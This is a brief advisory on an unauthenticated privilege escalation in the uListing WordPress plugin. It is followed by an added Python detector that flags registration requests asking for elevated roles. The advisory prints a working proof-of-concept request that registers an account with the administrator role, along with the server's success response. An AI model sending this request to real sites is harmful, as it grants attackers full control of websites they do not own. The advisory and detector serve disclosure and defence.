An unauthenticated privilege escalation vulnerability was discovered in the uListing plugin for WordPress, affecting versions through v2.0.5. Exploitation requires that user registration is allowed on the target website.

PoC | Unauthenticated Privilege Escalation | Request:

POST /wp-admin/admin-ajax.php?action=stm_listing_register HTTP/2
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/json;charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 205

{"login":"Visse","first_name":"Visse","last_name":"Visse","email":"[email protected]","role":"administrator","password":"admin","password_repeat":"admin","nonce":"ac88e123d8","custom_fields":{}}

PoC | Unauthenticated Privilege Escalation | Response:
{"errors":[],"message":"Registration completed successfully.","status":"success"}
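
For defenders, the following added example (not part of the original advisory and not uListing code) flags captured registration requests to the stm_listing_register action whose JSON body asks for a role outside an allowlist. It assumes request bodies are available, for instance from WAF or reverse-proxy body logging, and that "subscriber" is the site's default role; the function names and sample captures are constructed for illustration.

```python
import json
from urllib.parse import parse_qs, urlsplit

TARGET_ACTION = "stm_listing_register"  # AJAX action from the advisory's request
ALLOWED_ROLES = {"subscriber"}          # assumption: the site's default role

def parse_raw_request(raw):
    """Split a captured HTTP request into (method, target, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n", 1)[0].split()
    if len(parts) < 2:  # malformed request line: nothing to match on
        return "", "", body.strip()
    return parts[0].upper(), parts[1], body.strip()

def inspect_registration(raw):
    """Return a finding dict for a suspicious registration, else None."""
    method, target, body = parse_raw_request(raw)
    url = urlsplit(target)
    if method != "POST" or not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    if TARGET_ACTION not in parse_qs(url.query).get("action", []):
        return None
    try:
        payload = json.loads(body)
    except ValueError:
        # A body that does not parse still deserves a manual look.
        return {"verdict": "review", "reason": "unparseable JSON body"}
    if not isinstance(payload, dict) or "role" not in payload:
        return None
    role = str(payload["role"]).strip().lower()
    if role in ALLOWED_ROLES:
        return None
    return {"verdict": "alert", "login": payload.get("login"), "role": role}

# Constructed sample captures (not real traffic).
SAMPLE_ESCALATION = (
    "POST /wp-admin/admin-ajax.php?action=stm_listing_register HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "Content-Type: application/json;charset=utf-8\r\n\r\n"
    '{"login":"alice","email":"alice@example.com","role":"administrator"}'
)
SAMPLE_BENIGN = SAMPLE_ESCALATION.replace('"role":"administrator"', '"role":"subscriber"')

if __name__ == "__main__":
    for name, raw in (("escalation", SAMPLE_ESCALATION), ("benign", SAMPLE_BENIGN)):
        print(name, inspect_registration(raw))
```

An "alert" finding is a reason to check whether the named login now exists on the site with an elevated role.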